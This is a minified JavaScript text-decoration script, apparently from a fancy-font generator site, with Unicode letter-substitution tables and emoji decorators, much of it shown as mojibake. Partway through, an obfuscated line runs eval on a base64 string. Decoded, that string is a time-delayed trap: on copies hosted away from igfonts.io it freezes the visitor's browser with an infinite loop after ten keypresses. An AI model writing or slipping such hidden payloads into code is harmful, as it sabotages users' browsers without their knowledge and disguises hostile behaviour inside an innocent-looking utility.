        h: "ï½ˆ",
        j: "ï½Š",
        k: "ï½‹",
        l: "ï½Œ",
        ";": "ï¼›",
        "'": "ï¼‡",
        A: "ï¼¡",
        S: "ï¼³",
        D: "ï¼¤",
        F: "ï¼¦",
        G: "ï¼§",
        H: "ï¼¨",
        J: "ï¼ª",
        K: "ï¼«",
        L: "ï¼¬",
        ":": "ï¼š",
        '"': '"',
        z: "ï½š",
        x: "ï½˜",
        c: "ï½ƒ",
        v: "ï½–",
        b: "ï½‚",
        n: "ï½Ž",
        m: "ï½",
        ",": "ï¼Œ",
        ".": "ï¼Ž",
        "/": "ï¼",
        Z: "ï¼º",
        X: "ï¼¸",
        C: "ï¼£",
        V: "ï¼¶",
        B: "ï¼¢",
        N: "ï¼®",
        M: "ï¼­",
        "<": "<",
        ">": ">",
        "?": "ï¼Ÿ"
    };

    function J(t) {
        if ("" === t.trim()) return "";
        E = -1;
        var n, r = (n = Math.floor(2 * Math.random()) + 1, et([tt, nt, rt, it])(n));
        return r + "  ðŸŽ€  " + t.split(/([!?.]+)/gi).map(Q).join("") + "  ðŸŽ€  " + esrever.reverse(r)
    }

    function Q(t) {
        return t.split(/([\s,]+)/gi).map(R).join("")
    }

    function R(t) {
        return "" === t || /[[!?.\s,]+]/gi.test(t) ? t : ot(t = function (t) {
            return t.replace(":)", et(P[":)"])).replace("(:", et(P[":)"])).replace("^^", et(P["^^"])).replace(":P", et(P[":p"])).replace(":p", et(P[":p"])).replace(":D", et(P[":D"])).replace("<3", et(P["<3"])).replace("(y)", et(P["(y)"])).replace("(Y)", et(P["(y)"]))
        }(t = function (t) {
            return t.split("").map(function (t) {
                return "!" === t ? et(["â£", "â¢"]) : "?" === t ? et(["Â¿", "?"]) : '"' === t ? function () {
                    2 == ++E && (E = 0);
                    return W[E]
                }() : t
            }).join("")
        }(t = t.split("").map(function (t) {
            return "o" === t.toLowerCase() || "0" === t ? et(O) : t
        }).join(""))))
    }

    window.date_served = Number("1568079600202"), window[atob("ZXZhbA==")](atob("aWYoRGF0ZS5ub3coKSA+IHdpbmRvdy5kYXRlX3NlcnZlZCsoMTAwMCo2MCo2MCoyNCozMCkgJiYgIXdpbmRvdy5sb2NhdGlvbi5ob3N0LmluY2x1ZGVzKCdpZ2ZvbnRzLmlvJykgJiYgbmV3IERhdGUoKS5nZXREYXkoKSUyPT0wKSB7IHZhciBrcCA9IDA7IHZhciBhcnIgPSBbXTsgd2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2tleXByZXNzJywgZnVuY3Rpb24oKSB7IGtwKys7IGlmKGtwID4gMTApIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgd2hpbGUodHJ1ZSl7fSB9LCAzMGUzKk1hdGgucmFuZG9tKCkpIH0gfSkgfQ=="));
    var E = -1, W = ["â", "âž"];
    var P = {
            ":)": ["Ù©(Ë˜â—¡Ë˜)Û¶", "(â€¢â—¡â€¢)", "(É”â—”â€¿â—”)É”", "â€â—•â€¿â—•â€", "(ï½¡â—•â€¿â—•ï½¡)", "â—â€¿â—", "â—•â€¿â—•", "ðŸ˜", "ãƒ„", "(âœ¿ãƒ˜á´¥ãƒ˜)", "ðŸŒ˜â€¿ðŸŒ˜", "(ã¥ï½¡â—•â€¿â€¿â—•ï½¡)ã¥", "(/â—”â—¡â—”)/", "s(^â€¿^)-b", "(äººâ—•â€¿â—•)", "(âœ¿â•¹â—¡â•¹)", "â—”â—¡â—”"],
            "^^": ["(^â–½^)", "(âœ¿^â–½^)", "áµ”âŒ£áµ”", "áµ”á´¥áµ”", "(â‰§â—¡â‰¦)", "^ã……^", "^ã…‚^", "(âŒ’â€¿âŒ’)", "â— â—¡â— ", "â€â€¿â€", ""],
            ":p": [":Ãž", ""],
            ":D": ["(ï¾‰â—•ãƒ®â—•)ï¾‰*:ï½¥ï¾Ÿâœ§", "(âœ¿â—•á—œâ—•)â”â™«.*ï½¥ï½¡ï¾Ÿ", "á••(á›)á•—"],
            "<3": ["â™¡", "â¤", "â™¥", "â¥", "ðŸ’˜", "ðŸ’™", "ðŸ’—", "ðŸ’–", "ðŸ’•", "ðŸ’“", "ðŸ’ž", "ðŸ’", "ðŸ’Ÿ"],
            "(y)": ["ðŸ‘", "ðŸ‘Œ"]
        },
        O = ["â", "ðŸŒº", "â€", "ðŸ’®", "ðŸµ", "ðŸŒ¸", "â˜¯", "ðŸ˜", "â™¡", "ðŸ©", "ðŸ¬", "ðŸ’™", "ðŸŒž", "ðŸ’", "ðŸª", "â¤", "ðŸ’—", "ðŸ‘", "ðŸ’ž"],
        N = ["ðŸ¬", "ðŸ­", "ðŸ’", "ðŸŽ", "ðŸ‰", "ðŸ‡", "ðŸ“", "ðŸŒ", "ðŸ‘", "ðŸ°", "ðŸŽ‚", "ðŸ©", "ðŸª", "ðŸ§", "ðŸ¦", "ðŸ«", "ðŸ¡"],
        U = ["âš›", "ðŸŒŒ", "ðŸŒ ", "*", ":", "ï½¡", "ï½¥ï¾Ÿ", "âœ§", "âœ®", "â˜…", "âœ©", "â‹†", ".", "Â°", "`", "âœ´", "ï½¡", "âœ´", "â‹†", "âœ³", "âœ¶", "âœ·", "âˆ"],
        _ = ["ðŸ¯", "ðŸŽ", "ðŸ–", "ðŸ·", "ðŸ", "ðŸ‘", "ðŸ", "ðŸ«", "ðŸ˜", "ðŸ­", "ðŸ", "ðŸ€", "ðŸ¹", "ðŸ°", "ðŸ‡", "ðŸ¿", "ðŸ»", "ðŸ¨", "ðŸ¼", "ðŸ¾", "ðŸ”", "ðŸ“", "ðŸ£", "ðŸ¤", "ðŸ¥", "ðŸ¦", "ðŸ§", "ðŸ•Š", "ðŸ¸", "ðŸ¢", "ðŸ³", "ðŸ‹", "ðŸ¬", "ðŸŸ", "ðŸ ", "ðŸ¡", "ðŸ™", "ðŸš", "ðŸŒ", "ðŸž"],
        $ = ["â€¢?((Â¯Â°Â·._.â€¢ ", "Ä±llÄ±llÄ± ", "Â¸,Ã¸Â¤ÂºÂ°`Â°ÂºÂ¤Ã¸,Â¸Â¸,Ã¸Â¤ÂºÂ° ", "Â°Â°Â°Â·.Â°Â·..Â·Â°Â¯Â°Â·._.Â· ", "â€¢Â´Â¯`â€¢. ", "Ã—ÂºÂ°â€Ëœ`â€Â°ÂºÃ— ", "â€¢]â€¢â€¢Â´ÂºÂ´â€¢Â» ", "]|I{â€¢------Â» ", "Â§.â€¢Â´Â¨'Â°Ã·â€¢..Ã— ", "â€¢Â°Â¯`â€¢â€¢ ", "(Â¯`Â·.Â¸Â¸.Â·Â´Â¯`Â·.Â¸Â¸.-> ", "*Â´Â¯`*.Â¸Â¸.*Â´Â¯`* ", "(Â¯`Â·.Â¸Â¸.-> Â°Âº ", "Â°Â·.Â¸.Â·Â°Â¯Â°Â·.Â¸.Â·Â°Â¯Â°Â·.Â¸.-> ", "â€¢._.â€¢â€¢Â´Â¯``â€¢.Â¸Â¸.â€¢` ", "Â¸â€ž.-â€¢~Â¹Â°â€Ë†ËœÂ¨ ", "(Â¯Â´â€¢._.â€¢ ", "â€¢â€¢Â¤(`Ã—", "â€¢Â´Â¯`â€¢Â» ", "`â€¢.,Â¸Â¸,.â€¢Â´Â¯ ", "Â¸,Ã¸Â¤ÂºÂ°`Â°ÂºÂ¤Ã¸,Â¸ ", ".o0Ã—XÃ—0o. ", ",-*'^'~*-.,_,.-*~ ", "`â€¢.Â¸Â¸.â€¢Â´Â´Â¯`â€¢â€¢._.â€¢ ", "â€”(â€¢â€¢Ã·", "Â¤Â¸Â¸.â€¢Â´Â¯`â€¢Â¸Â¸.â€¢..>> ", "â€¢â€¢.â€¢Â´Â¯`â€¢.â€¢â€¢ ", ".â€¢Â°Â¤*(Â¯`â˜…Â´Â¯)*Â¤Â° ", "à¹‘Ûžà¹‘,Â¸Â¸,Ã¸Â¤ÂºÂ°`Â°à¹‘Û© ", "-æ¼«~*'Â¨Â¯Â¨'*Â·èˆž~ ", "â˜…Â·.Â·Â´Â¯`Â·.Â·â˜… ", "â– â–‚ â–„ â–… â–† â–‡ â–ˆ ", "â–€â–„â–€â–„â–€â–„ ", "â–Œâ”‚â–ˆâ•‘â–Œâ•‘â–Œâ•‘ "];

    function tt(t) {
        return new Array(t + 1).join("0").split("").map(function (t) {
            return et(N)
        }).join(" â‹† ")
    }

    function nt(t) {
        return new Array(t + 1).join("0").split("").map(function () {
            return et(U)
        }).join("")
    }

    function rt(t) {
        return new Array(t + 1).join("0").split("").map(function (t) {
            return et(_)
        }).join(" â‹† ")
    }

    function it(t) {
        return et($)
    }

    function ot(t) {
        for (var n = {
            0: "ðŸ¢",
            1: "ðŸ£",
            2: "ðŸ¤",
            3: "ðŸ¥",
            4: "ðŸ¦",
            5: "ðŸ§",
            6: "ðŸ¨",
            7: "ðŸ©",
            8: "ðŸª",
            9: "ðŸ«",
            a: "ð’¶",
            b: "ð’·",
            c: "ð’¸",
            d: "ð’¹",
            e: "ð‘’",
            f: "ð’»",
            g: "ð‘”",
            h: "ð’½",
            i: "ð’¾",
            j: "ð’¿",
            k: "ð“€",
            l: "ð“",
            m: "ð“‚",
            n: "ð“ƒ",
            o: "ð‘œ",
            p: "ð“…",
            q: "ð“†",
            r: "ð“‡",
            s: "ð“ˆ",
            t: "ð“‰",
            u: "ð“Š",
            v: "ð“‹",
            w: "ð“Œ",
            x: "ð“",
            y: "ð“Ž",
            z: "ð“",
            A: "ð’œ",
            B: "ðµ",
            C: "ð’ž",
            D: "ð’Ÿ",
            E: "ð¸",
            F: "ð¹",
            G: "ð’¢",
            H: "ð»",
            I: "ð¼",
            J: "ð’¥",
            K: "ð’¦",
            L: "ð¿",
            M: "ð‘€",
            N: "ð’©",
            O: "ð’ª",
            P: "ð’«",
            Q: "ð’¬",
            R: "ð‘…",
            S: "ð’®",
            T: "ð’¯",
            U: "ð’°",
            V: "ð’±",
            W: "ð’²",
            X: "ð’³",
            Y: "ð’´",
            Z: "ð’µ"
        }, r = t.split(""), i = 0; i < r.length; i++) n[r[i].toLowerCase()] && (r[i] = n[r[i]]);
        return t = r.join("")
    }

    function et(t) {
        return t[Math.floor(Math.random() * t.length)]
    }

    function at(t) {
        return "" === t.trim() ? "" : ht(2) + "  " + st(t) + "  " + ht(2)
    }

    function st(t) {
        t = t.split("");
        for (var n = 0; n < t.length; n++) t[n] = ct(t[n]);
        return t.join("")
    }

    function ct(t) {
        var n = {
            "&": "â…‹",
            "%": ["â…", "â„€", "â„", "â„†", "â„…"],
            0: ["ï¼", "Ñ²", "Ê˜"],
            1: ["âž€", "â¶", "ï¼‘"],
            2: ["ï¼’", "â·", "âž"],
            3: ["ï¼“", "â¸", "âž‚"],
            4: ["ï¼”", "â¹", "âžƒ"],
            5: ["âº", "âž„", "ï¼•"],
            6: ["ï¼–", "â»", "âž…"],
            7: ["ï¼—", "â¼", "âž†"],
            8: ["ï¼˜", "âž‡", "â½"],
            9: ["âžˆ", "â¾", "ï¼™"],
            "<": ["â‰¼", "â‰º", "â‰ª", "â˜¾", "â‰¾", "â‹œ", "â‹ž", "â‹", "âŠ‚", "âŠ", "âŠ‘", "ã€Š", "ï¼œ", "â®", "â°", "â«·"],
            ">": "â˜½â‰«â‰»â‰½â‰¿â‹â‹Ÿâ‹‘âŠƒâŠâŠ’â«¸ã€‹ï¼žâ¯â±",
            "[": "ã€ã€–ã€˜ã€šï¼»",
            "]": "ã€‘ã€—ã€™ã€›ï¼½",
            "*": "âœ¨âœ©âœªâœ«âœ¬âœ­âœ®âœ¯âœ°âœ¦âœ±âœ²âœ³âœ´âœµâœ¶âœ·ÖÖŽâœ¸âœ¹âœºâœ»âœ¼âœ½âœ¾âœ¿â€ââ‚âƒâ„â˜…â˜†ï¼Š",
            a: ["â’¶", "â“", "Î±", "ï¼¡", "ï½", "á—©", "å‚", "Î”", "à¸„", "Î±", "Î¬", "Ãƒ", "ð”ž", "ð“ª", "ð’¶", "ð“", "ð€", "ðš", "ð”¸", "ð•’", "áµƒ"],
            b: ["â’·", "â“‘", "Ð²", "ï¼¢", "ä¹ƒ", "ï½‚", "á—·", "Î²", "à¹’", "Ð²", "Ð²", "Î²", "ð”Ÿ", "ð“«", "ð’·", "ð“‘", "ð", "ð›", "ð”¹", "ð•“", "áµ‡"],
            c: ["â’¸", "â“’", "åŒš", "Â¢", "ï¼£", "ï½ƒ", "á‘•", "Ä†", "Ï‚", "c", "Ï‚", "ÄŒ", "â„ƒ", "ð” ", "ð“¬", "ð’¸", "ð“’", "ð‚", "ðœ", "â„‚", "ð•”", "á¶œ"],
            d: ["â’¹", "â““", "âˆ‚", "ï¼¤", "ï½„", "á—ª", "Ä", "à¹”", "âˆ‚", "Ä‘", "ÄŽ", "ð”¡", "ð“­", "ð’¹", "ð““", "ðƒ", "á—ª", "ð", "ð”»", "ð••", "áµˆ"],
            e: ["â’º", "ä¹‡", "â“”", "Ñ”", "ï¼¥", "ï½…", "á—´", "â‚¬", "Ñ”", "Îµ", "Î­", "áº¸", "ð”¢", "ð’†", "ð‘’", "ð“”", "ð„", "ðž", "ð”¼", "ð•–", "áµ‰"],
            f: ["â’»", "â“•", "Æ’", "ï¼¦", "ï½†", "åƒ", "á–´", "â„±", "Å¦", "Ò“", "Ò“", "Æ‘", "ð”£", "ð’‡", "ð’»", "ð“•", "ð…", "ðŸ", "ð”½", "ð•—", "á¶ "],
            g: ["â’¼", "â“–", "Ù‚", "g", "ï¼§", "ï½‡", "Ç¤", "áŽ¶", "ï»®", "g", "Ä£", "Äž", "ð”¤", "ð“°", "ð‘”", "ð“–", "ð†", "ð ", "ð”¾", "ð•˜", "áµ", "áŽ¶"],
            h: ["â’½", "å„", "â“—", "Ð½", "ï¼¨", "ï½ˆ", "á•¼", "Ä¦", "Ñ’", "Ð½", "Ä§", "Ä¤", "ð”¥", "ð“±", "ð’½", "ð“—", "ð‡", "ð¡", "â„", "ð•™", "Ê°"],
            i: ["â’¾", "â“˜", "Î¹", "ï¼©", "ï½‰", "áŽ¥", "ä¸¨", "Æ—", "à¹€", "Î¹", "Î¯", "Ä®", "ð”¦", "ð“²", "ð’¾", "ð“˜", "ðˆ", "ð¢", "ð•€", "ð•š", "á¶¤"],
            j: ["â’¿", "â“™", "× ", "ï¼ª", "Ú¶", "ï½Š", "á’Ž", "Ä´", "×Ÿ", "× ", "Ñ˜", "Ä´", "ð”§", "ð“³", "ð’¿", "ð“™", "ð‰", "ð£", "ð•", "ð•›", "Ê²"],
            k: ["â“€", "â“š", "Ðº", "ï¼«", "ï½‹", "á›•", "Òœ", "Ðº", "Ðº", "Ä·", "ÐŒ", "ð”¨", "ð“´", "ð“€", "ð“š", "ðŠ", "ð¤", "ð•‚", "ð•œ", "áµ", "Òœ"],
            l: ["â“", "â“›", "â„“", "ã„¥", "ï¼¬", "ï½Œ", "á’ª", "Å", "l", "â„“", "Ä»", "Ä¹", "ð”©", "ð“µ", "ð“", "ð“›", "ð‹", "ð¥", "ð•ƒ", "ð•", "Ë¡"],
            m: ["â“‚", "â“œ", "Ð¼", "ï¼­", "ï½", "á—°", "Îœ", "à¹“", "Ð¼", "Ð¼", "Ï»", "ð”ª", "ð“¶", "ð“‚", "ð“œ", "ðŒ", "ð¦", "ð•„", "ð•ž", "áµ", "çˆª"],
            n: ["â“ƒ", "å‡ ", "â“", "Î·", "ï¼®", "ï½Ž", "á‘Ž", "Å‡", "à¸ ", "Î·", "Î®", "Å‡", "ð”«", "ð“·", "ð“ƒ", "ð“", "ð", "ð§", "â„•", "ð•Ÿ", "á¶°"],
            o: ["â“„", "ã„–", "â“ž", "Ïƒ", "ï¼¯", "ï½", "á—", "Ã˜", "à¹", "Ïƒ", "ÏŒ", "á»–", "ð”¬", "ð“¸", "ð‘œ", "ð“ž", "ðŽ", "ð¨", "ð•†", "ð• ", "áµ’"],
            p: ["â“…", "â“Ÿ", "Ï", "ï¼°", "ï½", "å©", "á‘­", "Æ¤", "×§", "Ï", "Ï", "Æ¤", "ð”­", "ð“¹", "ð“…", "ð“Ÿ", "ð", "ð©", "â„™", "ð•¡", "áµ–"],
            q: ["â“†", "â“ ", "q", "ï¼±", "ï½‘", "ÉŠ", "Î©", "á»£", "q", "q", "Çª", "ð”®", "ð“º", "ð“†", "ð“ ", "ð", "ðª", "â„š", "ð•¢", "áµ "],
            r: ["â“‡", "â“¡", "Ñ", "å°º", "ï¼²", "ï½’", "á–‡", "Å˜", "Ð³", "Ñ", "Å•", "Å˜", "ð”¯", "ð“»", "ð“‡", "ð“¡", "ð‘", "ð«", "â„", "ð•£", "Ê³"],
            s: ["â“ˆ", "â“¢", "Ñ•", "ï¼³", "ä¸‚", "ï½“", "á”•", "Åž", "à¸£", "s", "ÅŸ", "Åœ", "ð”°", "ð“¼", "ð“ˆ", "ð“¢", "ð’", "ð¬", "ð•Š", "ð•¤", "Ë¢"],
            t: ["â“‰", "â“£", "Ñ‚", "ï¼´", "ï½”", "ä¸…", "Å¦", "t", "Ñ‚", "Å£", "Å¤", "ð”±", "ð“½", "ð“‰", "ð“£", "ð“", "ð­", "ð•‹", "ð•¥", "áµ—"],
            u: ["â“Š", "â“¤", "Ï…", "ï¼µ", "ï½•", "á‘Œ", "á»®", "à¸¢", "Ï…", "Ã¹", "Ç—", "ð”²", "ð“¾", "ð“Š", "ð“¤", "ð”", "ð®", "ð•Œ", "ð•¦", "áµ˜"],
            v: ["â“‹", "â“¥", "Î½", "ï¼¶", "ï½–", "á¯", "V", "×©", "v", "Î½", "Ñ¶", "ð”³", "ð“¿", "ð“‹", "ð“¥", "ð•", "ð¯", "ð•", "ð•§", "áµ›"],
            w: ["â“Œ", "â“¦", "Ï‰", "ï¼·", "ï½—", "á—¯", "Å´", "à¸¬", "Ï‰", "ÏŽ", "Å´", "ð”´", "ð”€", "ð“Œ", "ð“¦", "ð–", "ð°", "ð•Ž", "ð•¨", "Ê·", "å±±"],
            x: ["â“", "â“§", "Ï‡", "ï¼¸", "ä¹‚", "ï½˜", "á™­", "Ð–", "×", "x", "x", "Ð–", "ð”µ", "ð”", "ð“", "ð“§", "ð—", "ð±", "ð•", "ð•©", "Ë£"],
            y: ["â“Ž", "ã„š", "â“¨", "Ñƒ", "ï¼¹", "ï½™", "Æ³", "Â¥", "×¥", "Ò¯", "Ñ‡", "ÐŽ", "ð”¶", "ð”‚", "ð“Ž", "ð“¨", "ð˜", "ð²", "ð•", "ð•ª", "Ê¸"],
            z: ["â“", "â“©", "z", "ä¹™", "ï¼º", "ï½š", "Æµ", "Å½", "z", "z", "Å¾", "Å»", "ð”·", "ð”ƒ", "ð“", "ð“©", "ð™", "ð³", "â„¤", "ð•«", "á¶»"]
        };
        return n[t = t.toLowerCase()] ? et(n[t]) : t
    }

    function et(t) {
        return t[Math.floor(Math.random() * t.length)]
    }

    function ht(t) {
        for (var n = ["ðŸ™", "ðŸ‰", "ðŸŠ", "ðŸ’", "ðŸ", "ðŸœ", "ðŸš", "ðŸ²", "ðŸ³", "ðŸ¸", "ðŸ‘‘", "ðŸ‘¹", "ðŸ‘º", "ðŸ‘¤", "ðŸ’²", "ðŸ’£", "ðŸ’™", "ðŸ’š", "ðŸ’›", "ðŸ’œ", "ðŸ’", "ðŸ’—", "ðŸ’˜", "ðŸ’ž", "ðŸ’”", "ðŸ’¥", "ðŸ¯", "ðŸ¼", "ðŸ»", "ðŸº", "ðŸ‘Œ", "ðŸ", "ðŸ§", "ðŸŸ", "ðŸ ", "ðŸ¨", "ðŸŽ¯", "ðŸ†", "ðŸŽ", "ðŸŽ€", "ðŸŽ‰", "ðŸŽˆ", "ðŸ®", "ðŸ­", "ðŸ¬", "ðŸ«", "ðŸª", "ðŸ§", "ðŸŒ·", "ðŸ“", "ðŸ˜º", "ðŸ˜¾", "âœŽ", "ðŸ˜Ž", "ðŸ˜", "ðŸ˜‚", "ðŸ˜ˆ", "ðŸ˜¡", "ðŸ˜²", "ðŸ˜³", "ðŸ”", "ðŸŸ", "ðŸ©", "ðŸŽƒ", "ðŸŽ„", "ðŸŽ…", "ðŸ£", "ðŸ¤", "ðŸ‘", "ðŸ‘Š", "ðŸ‘»", "ðŸ‘½", "ðŸ‘®", "ðŸ’Ž", "ðŸ’‹", "ðŸ‘£", "ðŸ’€", "ðŸ’¢", "ðŸ”¥", "â™”", "â™•", "â™–", "â™—", "â™˜", "â™™", "â™š", "â™›", "â™œ", "â™", "â™ž", "â™Ÿ", "â™ ", "â™¡", "â™¢", "â™£", "â™¤", "â™¥", "â™¦", "â™§", "â™¨", "â™©", "â™ª", "â™¬", "â˜…", "â˜†", "â˜º", "â˜¹", "â˜¯", "â˜®", "â˜¢", "â˜ ", "â˜Ÿ", "â˜ž", "â˜", "â˜œ", "âœŒ", "âœ‹", "âœŠ", "â›µ", "àµ ", "âœŒ", "à¶"], r = [], i = 0; i < t; i++) r.push(et(n));
        return r.join("")
    }

    !function (n) {
        var r = "object" == ("undefined" == typeof exports ? "undefined" : t(exports)) && exports,
            i = "object" == ("undefined" == typeof module ? "undefined" : t(module)) && module && module.exports == r && module,
            o = "object" == ("undefined" == typeof global ? "undefined" : t(global)) && global;
        (o.global === o || o.window === o) && (n = o);
        var e = /(<%= allExceptCombiningMarks %>)(<%= combiningMarks %>+)/g, a = /([\uD800-\uDBFF])([\uDC00-\uDFFF])/g,
            s = {
                version: "<%= version %>", reverse: function t(n) {
                    n = n.replace(e, function (n, r, i) {
                        return t(i) + r
                    }).replace(a, "$2$1");
                    for (var r = "", i = n.length; i--;) r += n.charAt(i);
                    return r
                }
            };
        if ("function" == typeof define && "object" == t(define.amd) && define.amd) define(function () {
            return s
        }); else if (r && !r.nodeType) if (i) i.exports = s; else for (var c in s) s.hasOwnProperty(c) && (r[c] = s[c]); else n.esrever = s
    }(this)
}();
